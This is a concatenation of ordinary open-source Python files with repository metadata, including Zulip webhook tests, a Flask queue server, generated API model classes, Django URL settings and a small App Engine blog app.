expected_message = """john closed [PR #1](http://localhost:3000/john/try-git/pulls/1) from `feature` to `master`."""
self.check_webhook("pull_request__closed", expected_topic, expected_message)
def test_pull_request_merged(self) -> None:
expected_topic = "try-git / PR #2 Title Text for Pull Request"
expected_message = """john merged [PR #2](http://localhost:3000/john/try-git/pulls/2) from `feature` to `master`."""
self.check_webhook("pull_request__merged", expected_topic, expected_message)
def test_pull_request_reopened(self) -> None:
expected_topic = "test / PR #1349 reopened"
expected_message = """kostekIV reopened [PR #2](https://try.gogs.io/kostekIV/test/pulls/2) from `c` to `master`."""
self.check_webhook("pull_request__reopened", expected_topic, expected_message)
def test_pull_request_edited(self) -> None:
expected_topic = "test / PR #1349 Test"
expected_message = """kostekIV edited [PR #2](https://try.gogs.io/kostekIV/test/pulls/2) from `c` to `master`."""
self.check_webhook("pull_request__edited", expected_topic, expected_message)
def test_pull_request_assigned(self) -> None:
expected_topic = "test / PR #1349 Test"
expected_message = """kostekIV assigned [PR #2](https://try.gogs.io/kostekIV/test/pulls/2) from `c` to `master`."""
self.check_webhook("pull_request__assigned", expected_topic, expected_message)
def test_pull_request_synchronized(self) -> None:
expected_topic = "test / PR #1349 Test"
expected_message = """kostekIV synchronized [PR #2](https://try.gogs.io/kostekIV/test/pulls/2) from `c` to `master`."""
self.check_webhook("pull_request__synchronized", expected_topic, expected_message)
def test_issues_opened(self) -> None:
expected_topic = "test / Issue #3 New test issue"
expected_message = """kostekIV opened [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nTest\n~~~"""
self.check_webhook("issues__opened", expected_topic, expected_message)
def test_issues_reopened(self) -> None:
expected_topic = "test / Issue #3 New test issue"
expected_message = """kostekIV reopened [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nTest\n~~~"""
self.check_webhook("issues__reopened", expected_topic, expected_message)
def test_issues_edited(self) -> None:
expected_topic = "test / Issue #3 New test issue"
expected_message = """kostekIV edited [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nTest edit\n~~~"""
self.check_webhook("issues__edited", expected_topic, expected_message)
def test_issues_assignee(self) -> None:
expected_topic = "test / Issue #3 New test issue"
expected_message = """kostekIV assigned [Issue #3](https://try.gogs.io/kostekIV/test/issues/3) (assigned to kostekIV):\n\n~~~ quote\nTest\n~~~"""
self.check_webhook("issues__assigned", expected_topic, expected_message)
def test_issues_closed(self) -> None:
expected_topic = "test / Issue #3 New test issue"
expected_message = """kostekIV closed [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nClosed #3\n~~~"""
self.check_webhook("issues__closed", expected_topic, expected_message)
def test_issue_comment_new(self) -> None:
expected_topic = "test / Issue #3 New test issue"
expected_message = """kostekIV [commented](https://try.gogs.io/kostekIV/test/issues/3#issuecomment-3635) on [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nTest comment\n~~~"""
self.check_webhook("issue_comment__new", expected_topic, expected_message)
def test_issue_comment_edited(self) -> None:
expected_topic = "test / Issue #3 New test issue"
expected_message = """kostekIV edited a [comment](https://try.gogs.io/kostekIV/test/issues/3#issuecomment-3634) on [Issue #3](https://try.gogs.io/kostekIV/test/issues/3):\n\n~~~ quote\nedit comment\n~~~"""
self.check_webhook("issue_comment__edited", expected_topic, expected_message)
def test_release_published(self) -> None:
expected_topic = "zulip_test / v1.4 Title"
expected_message = """cestrell published release [Title](https://try.gogs.io/cestrell/zulip_test) for tag v1.4."""
self.check_webhook("release__published", expected_topic, expected_message)
@patch('zerver.webhooks.gogs.view.check_send_webhook_message')
def test_push_filtered_by_branches_ignore(self, check_send_webhook_message_mock: MagicMock) -> None:
self.url = self.build_webhook_url(branches='changes,development')
payload = self.get_body('push')
result = self.client_post(self.url, payload, HTTP_X_GOGS_EVENT='push',
content_type="application/json")
self.assertFalse(check_send_webhook_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.gogs.view.check_send_webhook_message')
def test_push_commits_more_than_limits_filtered_by_branches_ignore(
self, check_send_webhook_message_mock: MagicMock) -> None:
self.url = self.build_webhook_url(branches='changes,development')
payload = self.get_body('push__commits_more_than_limits')
result = self.client_post(self.url, payload, HTTP_X_GOGS_EVENT='push',
content_type="application/json")
self.assertFalse(check_send_webhook_message_mock.called)
self.assert_json_success(result)
@patch('zerver.webhooks.gogs.view.check_send_webhook_message')
def test_push_multiple_committers_filtered_by_branches_ignore(
self, check_send_webhook_message_mock: MagicMock) -> None:
self.url = self.build_webhook_url(branches='changes,development')
payload = self.get_body('push__commits_multiple_committers')
result = self.client_post(self.url, payload, HTTP_X_GOGS_EVENT='push',
content_type="application/json")
self.assertFalse(check_send_webhook_message_mock.called)
self.assert_json_success(result)
|
{
"content_hash": "3f2728853a508b2cfd801d8aae5f145a",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 368,
"avg_line_length": 69.99397590361446,
"alnum_prop": 0.6918839831310784,
"repo_name": "showell/zulip",
"id": "c8f867e60f368d3c8ac4f122b8efac4650c5a58a",
"size": "11619",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "zerver/webhooks/gogs/tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "433235"
},
{
"name": "Dockerfile",
"bytes": "2941"
},
{
"name": "Emacs Lisp",
"bytes": "157"
},
{
"name": "HTML",
"bytes": "634357"
},
{
"name": "Handlebars",
"bytes": "235334"
},
{
"name": "JavaScript",
"bytes": "3341135"
},
{
"name": "Perl",
"bytes": "8594"
},
{
"name": "Puppet",
"bytes": "79720"
},
{
"name": "Python",
"bytes": "8120030"
},
{
"name": "Ruby",
"bytes": "8480"
},
{
"name": "Shell",
"bytes": "133132"
},
{
"name": "TypeScript",
"bytes": "20603"
}
],
"symlink_target": ""
}
|
from flask import Flask, request, jsonify
from collections import deque
import sys
app = Flask(__name__)
queue = deque([])
@app.route('/init', methods=['GET', 'POST'])
def initialize():
if request.method == 'POST':
global queue
data = request.get_json();
#print( data)
queue = deque(data['list'])
resp = {
"Message": "Queue intialized",
"queue": list(queue)
}
return jsonify(resp)
else:
return "Error!"
@app.route('/query', methods=['GET', 'POST'])
def query():
global queue
if request.method == 'GET' or request.method == 'POST':
if len(queue) == 0:
return jsonify({
'data': -1,
'success': True
})
ele = queue.popleft()
return jsonify({
'data': ele,
'success': True
})
else:
return 'Error'
@app.route('/enqueue', methods=['GET', 'POST'])
def enqueue():
global queue
if request.method == 'GET' or request.method == 'POST':
data = request.get_json()
ele = queue.append(data['data'])
return jsonify({
'data': ele,
'success': True
})
else:
return 'Error'
@app.route('/enqueue_list', methods=['GET', 'POST'])
def enqueue_list():
global queue
if request.method == 'GET' or request.method == 'POST':
if len(queue) == 0:
return jsonify({
'Error': True,
'Message': 'Queue empty'
})
else:
data = request.get_json()
ele = queue.extend(data['data'])
return jsonify({
'data': ele,
'success': True
})
else:
return 'Error'
@app.route('/size', methods=['GET', 'POST'])
def size():
global queue
if request.method == 'GET' or request.method == 'POST':
return jsonify({
'Size': len(queue),
'Message': 'Size of queue'
})
else:
return 'Error'
@app.route('/clear', methods=['GET'])
def clearQueue():
global queue
if request.method == 'GET':
queue = deque([])
return jsonify({
'Message': 'Queue successfully cleared'
})
else:
return 'Error!'
@app.route('/check', methods=['GET'])
def checkQueue():
global queue
if request.method == 'GET':
return jsonify({
'Queue': list(queue)
})
else:
return 'Error!'
if __name__ == "__main__":
print ("Server Running")
if len(sys.argv) == 2:
server_port = int(sys.argv[1])
else:
server_port = 7979
app.run(host= '0.0.0.0', port = server_port)
|
{
"content_hash": "3373b3a0b41c04f7810d749ce9ca6d2f",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 56,
"avg_line_length": 19.643478260869564,
"alnum_prop": 0.6007082779991146,
"repo_name": "fossdevil/Assignments",
"id": "7dd2382fc06072a92785d7eeef01618f3193caf2",
"size": "2259",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Miscellaneous/services/queue/queue_server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "2425793"
},
{
"name": "Python",
"bytes": "61303"
},
{
"name": "TeX",
"bytes": "45679"
},
{
"name": "Vim script",
"bytes": "15369"
}
],
"symlink_target": ""
}
|
from hisclient import exc
from hisclient.v2.client import Client as his_cli
from conveyor.conveyorheat.engine.clients import client_plugin
from conveyor.conveyorheat.engine import constraints
class HISClientPlugin(client_plugin.ClientPlugin):
exceptions_module = exc
service_types = [HIS] = ['his']
def _create(self):
endpoint = self._get_client_option('his', 'url')
args = {
'token': self.auth_token,
'insecure': self._get_client_option('his', 'insecure'),
'timeout': self._get_client_option('his', 'timeout'),
'cacert': self._get_client_option('his', 'ca_file'),
'cert': self._get_client_option('his', 'cert_file'),
'key': self._get_client_option('his', 'key_file'),
'ssl_compression': False
}
return his_cli(endpoint=endpoint, **args)
class HISConstraint(constraints.BaseCustomConstraint):
resource_client_name = 'his'
resource_getter_name = 'find_image_by_id'
|
{
"content_hash": "6991487e50b6b87885ab12e9cf13a538",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 67,
"avg_line_length": 34.724137931034484,
"alnum_prop": 0.6355511420059583,
"repo_name": "Hybrid-Cloud/conveyor",
"id": "925a292fe77267187260deec0b7044a22dc2f006",
"size": "1582",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "conveyor/conveyorheat/engine/clients/huawei/his.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3789174"
},
{
"name": "Shell",
"bytes": "16567"
}
],
"symlink_target": ""
}
|
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import bt_parameter_spec6
except ImportError:
bt_parameter_spec6 = sys.modules["onshape_client.oas.models.bt_parameter_spec6"]
try:
from onshape_client.oas.models import bt_parameter_spec_array2600_all_of
except ImportError:
bt_parameter_spec_array2600_all_of = sys.modules[
"onshape_client.oas.models.bt_parameter_spec_array2600_all_of"
]
try:
from onshape_client.oas.models import bt_parameter_visibility_condition177
except ImportError:
bt_parameter_visibility_condition177 = sys.modules[
"onshape_client.oas.models.bt_parameter_visibility_condition177"
]
try:
from onshape_client.oas.models import btm_parameter1
except ImportError:
btm_parameter1 = sys.modules["onshape_client.oas.models.btm_parameter1"]
class BTParameterSpecArray2600(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
("ui_hints",): {
"OPPOSITE_DIRECTION": "OPPOSITE_DIRECTION",
"ALWAYS_HIDDEN": "ALWAYS_HIDDEN",
"SHOW_CREATE_SELECTION": "SHOW_CREATE_SELECTION",
"CONTROL_VISIBILITY": "CONTROL_VISIBILITY",
"NO_PREVIEW_PROVIDED": "NO_PREVIEW_PROVIDED",
"REMEMBER_PREVIOUS_VALUE": "REMEMBER_PREVIOUS_VALUE",
"DISPLAY_SHORT": "DISPLAY_SHORT",
"ALLOW_FEATURE_SELECTION": "ALLOW_FEATURE_SELECTION",
"MATE_CONNECTOR_AXIS_TYPE": "MATE_CONNECTOR_AXIS_TYPE",
"PRIMARY_AXIS": "PRIMARY_AXIS",
"SHOW_EXPRESSION": "SHOW_EXPRESSION",
"OPPOSITE_DIRECTION_CIRCULAR": "OPPOSITE_DIRECTION_CIRCULAR",
"SHOW_LABEL": "SHOW_LABEL",
"HORIZONTAL_ENUM": "HORIZONTAL_ENUM",
"UNCONFIGURABLE": "UNCONFIGURABLE",
"MATCH_LAST_ARRAY_ITEM": "MATCH_LAST_ARRAY_ITEM",
"COLLAPSE_ARRAY_ITEMS": "COLLAPSE_ARRAY_ITEMS",
"INITIAL_FOCUS_ON_EDIT": "INITIAL_FOCUS_ON_EDIT",
"INITIAL_FOCUS": "INITIAL_FOCUS",
"DISPLAY_CURRENT_VALUE_ONLY": "DISPLAY_CURRENT_VALUE_ONLY",
"READ_ONLY": "READ_ONLY",
"PREVENT_CREATING_NEW_MATE_CONNECTORS": "PREVENT_CREATING_NEW_MATE_CONNECTORS",
"FIRST_IN_ROW": "FIRST_IN_ROW",
"ALLOW_QUERY_ORDER": "ALLOW_QUERY_ORDER",
"PREVENT_ARRAY_REORDER": "PREVENT_ARRAY_REORDER",
"UNKNOWN": "UNKNOWN",
},
}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"driven_query": (str,), # noqa: E501
"item_label_template": (str,), # noqa: E501
"item_name": (str,), # noqa: E501
"additional_localized_strings": (int,), # noqa: E501
"column_name": (str,), # noqa: E501
"default_value": (btm_parameter1.BTMParameter1,), # noqa: E501
"icon_uri": (str,), # noqa: E501
"localizable_name": (str,), # noqa: E501
"localized_name": (str,), # noqa: E501
"parameter_id": (str,), # noqa: E501
"parameter_name": (str,), # noqa: E501
"strings_to_localize": ([str],), # noqa: E501
"ui_hint": (str,), # noqa: E501
"ui_hints": ([str],), # noqa: E501
"visibility_condition": (
bt_parameter_visibility_condition177.BTParameterVisibilityCondition177,
), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"bt_type": "btType", # noqa: E501
"driven_query": "drivenQuery", # noqa: E501
"item_label_template": "itemLabelTemplate", # noqa: E501
"item_name": "itemName", # noqa: E501
"additional_localized_strings": "additionalLocalizedStrings", # noqa: E501
"column_name": "columnName", # noqa: E501
"default_value": "defaultValue", # noqa: E501
"icon_uri": "iconUri", # noqa: E501
"localizable_name": "localizableName", # noqa: E501
"localized_name": "localizedName", # noqa: E501
"parameter_id": "parameterId", # noqa: E501
"parameter_name": "parameterName", # noqa: E501
"strings_to_localize": "stringsToLocalize", # noqa: E501
"ui_hint": "uiHint", # noqa: E501
"ui_hints": "uiHints", # noqa: E501
"visibility_condition": "visibilityCondition", # noqa: E501
}
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
"_composed_instances",
"_var_name_to_model_instances",
"_additional_properties_model_instances",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""bt_parameter_spec_array2600.BTParameterSpecArray2600 - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
driven_query (str): [optional] # noqa: E501
item_label_template (str): [optional] # noqa: E501
item_name (str): [optional] # noqa: E501
additional_localized_strings (int): [optional] # noqa: E501
column_name (str): [optional] # noqa: E501
default_value (btm_parameter1.BTMParameter1): [optional] # noqa: E501
icon_uri (str): [optional] # noqa: E501
localizable_name (str): [optional] # noqa: E501
localized_name (str): [optional] # noqa: E501
parameter_id (str): [optional] # noqa: E501
parameter_name (str): [optional] # noqa: E501
strings_to_localize ([str]): [optional] # noqa: E501
ui_hint (str): [optional] # noqa: E501
ui_hints ([str]): [optional] # noqa: E501
visibility_condition (bt_parameter_visibility_condition177.BTParameterVisibilityCondition177): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
constant_args = {
"_check_type": _check_type,
"_path_to_item": _path_to_item,
"_from_server": _from_server,
"_configuration": _configuration,
}
required_args = {}
# remove args whose value is Null because they are unset
required_arg_names = list(required_args.keys())
for required_arg_name in required_arg_names:
if required_args[required_arg_name] is nulltype.Null:
del required_args[required_arg_name]
model_args = {}
model_args.update(required_args)
model_args.update(kwargs)
composed_info = validate_get_composed_info(constant_args, model_args, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
unused_args = composed_info[3]
for var_name, var_value in required_args.items():
setattr(self, var_name, var_value)
for var_name, var_value in six.iteritems(kwargs):
if (
var_name in unused_args
and self._configuration is not None
and self._configuration.discard_unknown_keys
and not self._additional_properties_model_instances
):
# discard variable.
continue
setattr(self, var_name, var_value)
@staticmethod
def _composed_schemas():
# we need this here to make our import statements work
# we must store _composed_schemas in here so the code is only run
# when we invoke this method. If we kept this at the class
# level we would get an error beause the class level
# code would be run when this module is imported, and these composed
# classes don't exist yet because their module has not finished
# loading
return {
"anyOf": [],
"allOf": [
bt_parameter_spec6.BTParameterSpec6,
bt_parameter_spec_array2600_all_of.BTParameterSpecArray2600AllOf,
],
"oneOf": [],
}
|
{
"content_hash": "ca5d6f6231f15e5a774a73779ba1148f",
"timestamp": "",
"source": "github",
"line_count": 278,
"max_line_length": 131,
"avg_line_length": 41.201438848920866,
"alnum_prop": 0.5856469355683604,
"repo_name": "onshape-public/onshape-clients",
"id": "af0344b122cb8e3502337335954e1e9bcd2cf3e7",
"size": "11471",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/onshape_client/oas/models/bt_parameter_spec_array2600.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4873"
},
{
"name": "Go",
"bytes": "59674"
},
{
"name": "HTML",
"bytes": "3851790"
},
{
"name": "JavaScript",
"bytes": "2217"
},
{
"name": "Makefile",
"bytes": "559"
},
{
"name": "Python",
"bytes": "7560009"
},
{
"name": "Shell",
"bytes": "3475"
},
{
"name": "TypeScript",
"bytes": "1412661"
}
],
"symlink_target": ""
}
|
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/creature/player/shared_rodian_female.iff"
result.attribute_template_id = -1
result.stfName("species","rodian")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
{
"content_hash": "1858f715be078a24e4ce2b1350e3c968",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 68,
"avg_line_length": 22.53846153846154,
"alnum_prop": 0.6928327645051194,
"repo_name": "obi-two/Rebelion",
"id": "fab67f073b8e9ac3da97bb510f3bcf798c9aced0",
"size": "438",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/creature/player/shared_rodian_female.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
}
|
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class SetSharedLinkAccessRightsResponse:
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'result': 'SetSharedLinkAccessRightsResult',
'status': 'str',
'error_message': 'str',
'composedOn': 'long'
}
self.result = None # SetSharedLinkAccessRightsResult
self.status = None # str
self.error_message = None # str
self.composedOn = None # long
|
{
"content_hash": "d436eb7eeaf11c0a7b60e2a75b084345",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 77,
"avg_line_length": 31.64864864864865,
"alnum_prop": 0.6575576430401366,
"repo_name": "liosha2007/temporary-groupdocs-python-sdk",
"id": "eabb0a81d0d67c27433fe08ddb1072837c180aeb",
"size": "1193",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "groupdocs/models/SetSharedLinkAccessRightsResponse.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1070081"
}
],
"symlink_target": ""
}
|
""" Manifest Test Settings
"""
# pylint: disable=invalid-name
from django.shortcuts import render
from django.urls import include, path, re_path
from django.views.generic import TemplateView
from rest_framework_jwt.views import (
obtain_jwt_token,
refresh_jwt_token,
verify_jwt_token,
)
from manifest import views
from manifest.forms import RegisterFormToS
TEST_SUCCESS_URL = "/test/"
TEST_REGISTER_FORM_CLASS = RegisterFormToS
def handler404(request, exception=Exception("Page not found!")):
return render(request, "404.html", status=404)
def handler500(request):
return render(request, "500.html", status=500)
urlpatterns = [
# fmt: off
path("accounts/", include("manifest.urls")),
path("manifest/", include("manifest.endpoints")),
path("flatpages/", include("django.contrib.flatpages.urls")),
path("jwt/obtain/", obtain_jwt_token),
path("jwt/refresh/", refresh_jwt_token),
path("jwt/verify/", verify_jwt_token),
re_path(
r"^users/(?P<page>\d+)$",
views.UserListView.as_view(paginate_by=1),
name="user_list_paginated"),
re_path(
r'^test-auth-login-success-url/$',
views.AuthLoginView.as_view(success_url=TEST_SUCCESS_URL),
name='test_auth_login_success_url',
),
re_path(
r'^test-auth-register-success-url/$',
views.AuthRegisterView.as_view(success_url=TEST_SUCCESS_URL),
name='test_auth_register_success_url',
),
re_path(
r'^test-auth-register-form-class/$',
views.AuthRegisterView.as_view(form_class=TEST_REGISTER_FORM_CLASS),
name='test_auth_register_form_class',
),
re_path(
r'^test-auth-activate-success-url/(?P<username>\w+)/(?P<token>\w+)/$',
views.AuthActivateView.as_view(success_url=TEST_SUCCESS_URL),
name='test_auth_activate_success_url',
),
re_path(
r'^test-profile-update-success-url/$',
views.ProfileUpdateView.as_view(success_url=TEST_SUCCESS_URL),
name='test_profile_update_success_url',
),
re_path(
r'^test-email-change-success-url/$',
views.EmailChangeView.as_view(success_url=TEST_SUCCESS_URL),
name='test_email_change_success_url',
),
re_path(
r'^test-email-change-confirm-success-url/'
r'(?P<username>\w+)/(?P<token>\w+)/$',
views.EmailChangeConfirmView.as_view(success_url=TEST_SUCCESS_URL),
name='test_email_change_confirm_success_url',
),
re_path(
r'^test-password-change-success-url/$',
views.PasswordChangeView.as_view(success_url=TEST_SUCCESS_URL),
name='test_password_change_success_url',
),
re_path(
r'^test-send-mail-mixin-subject/$',
views.EmailChangeView.as_view(
email_subject_template_name_new=None
),
name='test_send_mail_mixin_subject',
),
re_path(
r'^test-send-mail-mixin-message/$',
views.EmailChangeView.as_view(
email_message_template_name_new=None
),
name='test_send_mail_mixin_message',
),
re_path(
r'^test-send-mail-mixin-html/$',
views.EmailChangeView.as_view(
email_html_template_name_new=""
'manifest/emails/confirmation_email_message_new.txt'
),
name='test_send_mail_mixin_html',
),
re_path(
r'^404$',
handler404,
name='page_not_found',
),
re_path(
r'^500$',
handler500,
name='server_error',
),
re_path(
"^$",
TemplateView.as_view(template_name="homepage.html"), name="homepage"),
re_path(
"^(?!media|static|flatpages)",
TemplateView.as_view(template_name="vue.html"),
name="vue",
),
# fmt: on
]
|
{
"content_hash": "728ae75f39f50f2d195eda6681ddcb7a",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 78,
"avg_line_length": 28.30597014925373,
"alnum_prop": 0.6111257579752175,
"repo_name": "ozgurgunes/django-manifest",
"id": "7107c00805a887518f9f987129d124b45d9e90c2",
"size": "3817",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3085"
},
{
"name": "HTML",
"bytes": "33852"
},
{
"name": "JavaScript",
"bytes": "113339"
},
{
"name": "Python",
"bytes": "132152"
}
],
"symlink_target": ""
}
|
'''
Created on Apr 30, 2012
@author: h87966
Homework 3 - Basic blog
In order to be graded correctly for this homework, there are a
few things to keep in mind. We'll be grading your web app by
POSTing new blog entries to your form and checking that they
appear on your blog's front page. There are a few main issues
you need to keep in mind in order for this to work:
1. We assume your form to create new blog entries is at a path of
'/newpost' from your blog's front page. That is, if your blog's
front page is at 'www.myblog.com/blog', then the form is at
'www.myblog.com/blog/newpost'.
2. The form method must be POST, not GET.
3. The form input boxes must have the names 'subject' and 'content'
in order for the grading script to correctly post to them.
4. You must enter the full url into the supplied textbox above,
including the path to your blog's front page. For example,
our example app is running at http://cs253-homework-sean.appspot.com/blog,
but if we instead only entered http://udacity-cs253.appspot.com/ then
the grading script would not work.
5. Don't forget to escape your output!
My Notes from video:
1. Front page will list entries
2. A Form page to submit entries with a 'subject' and 'content' input
fields. Both fields are required and need to be validated with messages
3. Permalink page for each entry that has a unique url
Udacity basic blog app URL:
http://cs253-homework-sean.appspot.com/blog
My basic blog URL:
http://cdoremus-udacity-cs253/unit3/blog
'''
import webapp2
import os
from google.appengine.ext.webapp import template
from unit3.blog_service import BlogService
from unit3.blog_entry import BlogData
from unit3.blog_datastore_factory import BlogDataStoreFactory
class BlogFrontPage(webapp2.RequestHandler):
'''
Front page controller for Homework 3 - Basic Blog
'''
def get(self):
'''
Handles initial get request
'''
self.response.headers['Content-Type'] = 'text/html'
service = BlogService(BlogDataStoreFactory())
blog_entries = service.fetchAll()
values = {'blog_entries': blog_entries}
path = os.path.join(os.path.dirname(__file__), 'blog.html')
self.response.out.write(template.render(path, values))
class CreateBlogEntryPage(webapp2.RequestHandler):
def get(self):
'''
Handles request for the create page
'''
self.response.headers['Content-Type'] = 'text/html'
subject = self.request.get('subject')
content = self.request.get('content')
values = {'subject': subject, 'content':content}
path = os.path.join(os.path.dirname(__file__), 'create_blog_entry.html')
self.response.out.write(template.render(path, values))
class SaveBlogEntry(webapp2.RequestHandler):
def post(self):
'''
Handles blog entry creation
'''
self.response.headers['Content-Type'] = 'text/html'
isValid = True
values = {}
subject = self.request.get('subject')
if not subject:
values['subject_error'] = 'Blog subject is required'
isValid = False
content = self.request.get('content')
if not content:
values['content_error'] = 'Blog content is required'
isValid = False
path = None
if not isValid:
values['subject'] = subject
values['content'] = content
path = os.path.join(os.path.dirname(__file__), 'create_blog_entry.html')
else:
blog = BlogData(subject=subject, content=content)
service = BlogService(BlogDataStoreFactory())
service.save(blog)
blog_entries = service.fetchAll()
values['blog_entries'] = blog_entries
path = os.path.join(os.path.dirname(__file__), 'blog.html')
self.response.out.write(template.render(path, values))
class ShowBlogEntry(webapp2.RequestHandler):
def get(self):
'''
Handles displaying a blog entry
'''
self.response.headers['Content-Type'] = 'text/html'
entry_id = self.request.get('entry_id')
service = BlogService(BlogDataStoreFactory())
data = service.fetch(int(entry_id))
values = {'subject': data.subject, 'content':data.content}
path = os.path.join(os.path.dirname(__file__), 'show_blog_entry.html')
self.response.out.write(template.render(path, values))
|
{
"content_hash": "8a39c27934dc152c6654fb700bdb8abd",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 84,
"avg_line_length": 36.422764227642276,
"alnum_prop": 0.6591517857142857,
"repo_name": "cdoremus/udacity-python_web_development-cs253",
"id": "9d42bf458895f3a5ac5acad6822fa006f9e2d7f2",
"size": "4480",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/unit3/blog_main.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "15273"
},
{
"name": "Python",
"bytes": "233912"
}
],
"symlink_target": ""
}
|
"""Append module search paths for third-party packages to sys.path.
****************************************************************
* This module is automatically imported during initialization. *
****************************************************************
This will append site-specific paths to the module search path. On
Unix (including Mac OSX), it starts with sys.prefix and
sys.exec_prefix (if different) and appends
lib/python<version>/site-packages.
On other platforms (such as Windows), it tries each of the
prefixes directly, as well as with lib/site-packages appended. The
resulting directories, if they exist, are appended to sys.path, and
also inspected for path configuration files.
If a file named "pyvenv.cfg" exists one directory above sys.executable,
sys.prefix and sys.exec_prefix are set to that directory and
it is also checked for site-packages (sys.base_prefix and
sys.base_exec_prefix will always be the "real" prefixes of the Python
installation). If "pyvenv.cfg" (a bootstrap configuration file) contains
the key "include-system-site-packages" set to anything other than "false"
(case-insensitive), the system-level prefixes will still also be
searched for site-packages; otherwise they won't.
All of the resulting site-specific directories, if they exist, are
appended to sys.path, and also inspected for path configuration
files.
A path configuration file is a file whose name has the form
<package>.pth; its contents are additional directories (one per line)
to be added to sys.path. Non-existing directories (or
non-directories) are never added to sys.path; no directory is added to
sys.path more than once. Blank lines and lines beginning with
'#' are skipped. Lines starting with 'import' are executed.
For example, suppose sys.prefix and sys.exec_prefix are set to
/usr/local and there is a directory /usr/local/lib/python2.5/site-packages
with three subdirectories, foo, bar and spam, and two path
configuration files, foo.pth and bar.pth. Assume foo.pth contains the
following:
